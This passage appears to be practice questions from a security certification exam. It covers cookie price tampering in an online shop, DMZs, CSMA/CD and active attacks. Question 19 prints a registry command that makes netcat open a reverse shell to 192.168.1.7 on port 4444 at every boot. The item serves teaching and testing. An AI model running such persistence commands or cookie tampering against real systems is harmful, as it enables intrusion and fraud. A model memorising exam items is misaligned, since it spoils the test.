Question 16

John visits an online shop that stores the IDs and prices of the items to buy in a cookie. After selecting the items that he wants to buy, the attacker changes the price of the item to 1.
Original cookie values: ItemID1=2 ItemPrice1=900 ItemID2=1 ItemPrice2=200 Modified cookie values: ItemID1=2 ItemPrice1=1 ItemID2=1 ItemPrice2=1 Now, he clicks the Buy button, and the prices are sent to the server that calculates the total price.
Which of the following hacking techniques is John performing?
  • Question 17

    Which of the following statements are TRUE about Demilitarized zone (DMZ)? Each correct answer represents a complete solution. Choose all that apply.
  • Question 18

    CSMA/CD is specified in which of the following IEEE standards?
  • Question 19

    You run the following command on the remote Windows server 2003 computer:
    c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e
    cmd.exe"
    What task do you want to perform by running this command?Each correct answer represents a complete solution. Choose all that apply.
  • Question 20

    Which of the following attacks comes under the category of an active attack?